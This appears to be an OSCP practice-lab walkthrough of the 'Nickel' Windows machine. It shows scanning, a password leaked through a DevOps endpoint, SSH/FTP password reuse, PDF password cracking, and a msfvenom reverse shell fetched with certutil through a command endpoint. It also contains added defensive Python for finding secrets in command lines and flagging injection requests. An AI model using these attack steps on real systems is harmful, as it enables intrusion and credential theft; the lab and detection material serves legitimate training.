OSCP Lab: Nickel

news2024/12/23 16:27:51

Key points (1. Requesting information with the POST method 2. FTP/SSH password reuse 3. Cracking the PDF file password)

1. nmap scan

┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.237.99 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-22 04:06 EST
Nmap scan report for 192.168.237.99
Host is up (0.25s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
|   256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_  256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2024-01-29T02:08:16
|_Not valid after:  2024-07-30T02:08:16
|_ssl-date: 2024-02-22T09:10:45+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2024-02-22T09:09:32+00:00
5040/tcp  open  unknown
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-22T09:09:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 271.78 seconds


2. user priv

### No response:
http://192.168.237.99:33333/
##
http://192.168.237.99:8089/
## View source:
<h1>DevOps Dashboard</h1>
<hr>
<form action='http://169.254.153.224:33333/list-current-deployments' method='GET'>
<input type='submit' value='List Current Deployments'>
</form>
<br>
<form action='http://169.254.153.224:33333' method='GET'>
<input type='submit' value='List Running Processes'>
</form>
<br>
<form action='http://169.254.153.224:33333/list-active-nodes' method='GET'>
<input type='submit' value='List Active Nodes'>
</form>
<hr>

Visiting http://169.254.153.224:33333/list-current-deployments gives no response.
Append the path to: http://192.168.237.99:33333/list-running-procs
Change the GET method to POST: [screenshot]

2.1 Sensitive information found:

cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

Base64 decode: https://base64.us/
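The finding in 2.1 is a password passed as a command-line argument, with base64 as its only protection. As an added example (not part of the original write-up), the following audit sketch scans process command lines for secret-bearing flags and reports whether the value is plain or merely base64-encoded; the flag list and the function names are assumptions made for illustration.

```python
import base64
import binascii
import re
import string

# Flags that often carry a secret on a command line (assumed list; extend as needed).
SECRET_FLAG = re.compile(
    r'(?:^|\s)(-p|--password|--pass|--token|--secret)(?:\s+|=)'
    r'(?:"([^"]*)"|([^\s"-]\S*))',  # a value starting with "-" is the next flag, not a secret
    re.IGNORECASE,
)

def try_base64(value):
    """Return the decoded text if value is base64 of printable ASCII, else None."""
    if len(value) < 8 or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    if not text.strip() or any(c not in string.printable for c in text):
        return None
    return text.strip()  # encoders fed by `echo` leave a trailing newline

def find_cmdline_secrets(cmdlines):
    """Report every secret-bearing flag and whether base64 hides its value."""
    findings = []
    for line in cmdlines:
        for m in SECRET_FLAG.finditer(line):
            value = m.group(2) if m.group(2) is not None else m.group(3)
            decoded = try_base64(value)
            findings.append({
                "flag": m.group(1),
                "encoding": "base64" if decoded else "plain",
                "recovered": decoded or value,
                "cmdline": line,
            })
    return findings

# The first line is the one shown in this walkthrough; the other two are constructed.
SAMPLE = [
    r'cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah '
    r'-p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh',
    r'C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule',
    r'C:\tools\backup.exe --password=Summer2024! --target D:\data',
]

if __name__ == "__main__":
    for f in find_cmdline_secrets(SAMPLE):
        print(f["encoding"], f["flag"], f["recovered"])
```

The svchost line shows the false positive to avoid: `-p` there is a switch followed by another flag, not a password.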

2.2 SSH login

ariah:NowiseSloopTheory139
ssh ariah@192.168.237.99

##
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

ariah@NICKEL C:\Users\ariah>whoami
nickel\ariah

ariah@NICKEL C:\Users\ariah>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.237.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.237.254

ariah@NICKEL C:\Users\ariah>dir
 Volume in drive C has no label.
 Volume Serial Number is 9451-68F7

 Directory of C:\Users\ariah

10/15/2020  06:23 AM    <DIR>          .
10/15/2020  06:23 AM    <DIR>          ..
10/15/2020  06:23 AM    <DIR>          3D Objects
10/15/2020  06:23 AM    <DIR>          Contacts
04/14/2022  03:46 AM    <DIR>          Desktop
10/15/2020  06:23 AM    <DIR>          Documents
10/15/2020  06:23 AM    <DIR>          Downloads
10/15/2020  06:23 AM    <DIR>          Favorites
10/15/2020  06:23 AM    <DIR>          Links
10/15/2020  06:23 AM    <DIR>          Music
10/15/2020  06:25 AM    <DIR>          Pictures
10/15/2020  06:23 AM    <DIR>          Saved Games
10/15/2020  06:24 AM    <DIR>          Searches
10/15/2020  06:23 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   7,659,962,368 bytes free

ariah@NICKEL C:\Users\ariah>cd Desktop

ariah@NICKEL C:\Users\ariah\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9451-68F7

 Directory of C:\Users\ariah\Desktop

04/14/2022  03:46 AM    <DIR>          .
04/14/2022  03:46 AM    <DIR>          ..
02/21/2024  11:40 PM                34 local.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,659,962,368 bytes free

##
ariah@NICKEL C:\Users\ariah\Desktop>type local.txt
bc4d84f298cb790dc02b6513b767a143

3. root priv

Windows privilege escalation:

3.1 winpeas.exe found nothing useful:

ariah@NICKEL C:\Users\ariah\Desktop>certutil -urlcache -split -f http://192.168.45.234/winpeas.exe
###
ariah@NICKEL C:\Users\ariah\Desktop>winpeas.exe

3.2 SSH password reuse: log in to FTP with ariah:NowiseSloopTheory139

┌──(root㉿kali)-[~/Desktop]
└─# ftp 192.168.178.99                        
Connected to 192.168.178.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.178.99:root): ariah
331 Password required for ariah
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61706|)
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          46235 Sep 01  2020 Infrastructure.pdf
226 Successfully transferred "/"
ftp> get Infrastructure.pdf
local: Infrastructure.pdf remote: Infrastructure.pdf
229 Entering Extended Passive Mode (|||50539|)
150 Opening data channel for file download from server of "/Infrastructure.pdf"
100% |********************************************************************| 46235       33.65 KiB/s    00:00 ETA
226 Successfully transferred "/Infrastructure.pdf"
46235 bytes received in 00:01 (33.65 KiB/s)

## PDF password cracking:
┌──(root㉿kali)-[~/Desktop]
└─# pdfcrack Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt 
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -1060
Length: 128
Encrypted Metadata: True
FileID: 14350d814f7c974db9234e3e719e360b
U: 6aa1a24681b93038947f76796470dbb100000000000000000000000000000000
O: d9363dc61ac080ac4b9dad4f036888567a2d468a6703faf6216af1eb307921b0
Average Speed: 43868.9 w/s. Current Word: 'loritta30'
Average Speed: 44370.4 w/s. Current Word: 'graff01'
Average Speed: 44473.4 w/s. Current Word: 'xxxppp'
Average Speed: 44165.3 w/s. Current Word: 'stellyme'
Average Speed: 44073.3 w/s. Current Word: 'rachel41987'
Average Speed: 44192.8 w/s. Current Word: 'music_girl'
Average Speed: 44549.9 w/s. Current Word: 'lilneisy'
Average Speed: 44240.4 w/s. Current Word: 'jen5878'
Average Speed: 44587.6 w/s. Current Word: 'gagicumaiubeste'
Average Speed: 44437.6 w/s. Current Word: 'd.staley'
Average Speed: 44317.7 w/s. Current Word: 'bd82CC*^'
found user-password: 'ariah4168'

## Cracking the PDF with pdf2john and john:
┌──(root㉿kali)-[~/Desktop]
└─# pdf2john Infrastructure.pdf > 1.hash
                                                                                                                                             
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168        (Infrastructure.pdf)     
1g 0:00:00:57 DONE (2024-02-24 03:37) 0.01734g/s 173563p/s 173563c/s 173563C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed. 

### PDF contents:
Infrastructure Notes
Temporary Command endpoint: http://nickel/?
Backup system: http://nickel-backup/backup
NAS: http://corp-nas/files

Cracking the encrypted PDF: [screenshot]

PDF contents: [screenshot]
Edit the hosts file: [screenshot]

High-privilege command endpoint: [screenshot]

3.3 Reverse shell

## Generate the trojan payload
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe


┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80

## Download the payload:
http://nickel/?certutil%20-urlcache%20-split%20-f%20http://192.168.45.179/shell443.exe

## Listener:
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443  

## Trigger the reverse shell:
http://nickel/?shell443.exe

## proof.txt
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443              
listening on [any] 443 ...
connect to [192.168.45.179] from nickel [192.168.178.99] 50199
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.178.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.178.254

c:\Users\Administrator\Desktop>type proof.txt
type proof.txt
3e0fd8269fd99aaac34829668016651a

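The requests in 3.3 put a whole command line in the query string of the "Temporary Command endpoint". As an added example (not part of the original write-up), this detection sketch percent-decodes request URIs and flags the two request shapes seen above; the `METHOD URI` log format, the rule names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# certutil takes "-" or "/" before its verbs; match the download form seen in 3.3.
CERTUTIL_FETCH = re.compile(r'\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*\bhttps?://', re.I)
# A query that is nothing but an executable or script name, optionally with arguments.
BARE_EXE = re.compile(r'^[\w.\\:/-]+\.(?:exe|bat|cmd|ps1)(?:\s.*)?$', re.I)

def decode_query(uri, max_rounds=3):
    """Percent-decode the query repeatedly so double-encoded input is seen too."""
    query = urlsplit(uri).query
    for _ in range(max_rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query.strip()

def classify(uri):
    """Return the name of the matching rule, or None for an unremarkable request."""
    query = decode_query(uri)
    if CERTUTIL_FETCH.search(query):
        return "certutil-download"
    if BARE_EXE.match(query):
        return "bare-executable"
    return None

def scan(log_lines):
    """Yield (rule, method, decoded query) for each suspicious 'METHOD URI' line."""
    hits = []
    for line in log_lines:
        method, _, uri = line.partition(" ")
        rule = classify(uri)
        if rule:
            hits.append((rule, method, decode_query(uri)))
    return hits

# Constructed log lines: the first two mirror the requests in 3.3, the third is a
# double-encoded variant, the last two are ordinary key=value requests.
SAMPLE_LOG = [
    "GET /?certutil%20-urlcache%20-split%20-f%20http://192.168.45.179/shell443.exe",
    "GET /?shell443.exe",
    "GET /?CertUtil%2520/urlcache%2520/f%2520http://192.168.45.179/shell443.exe",
    "GET /backup?name=report.pdf",
    "GET /files?download=setup.exe",
]

if __name__ == "__main__":
    for rule, method, query in scan(SAMPLE_LOG):
        print(f"{rule:18} {method} {query}")
```

Ordinary `key=value` queries that merely mention an `.exe` file name are not flagged, because the bare-executable rule requires the whole query to be the command.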

4. Summary of key points

### 1. Requesting information with the POST method
### 2. FTP/SSH password reuse
### 3. Cracking the PDF file password
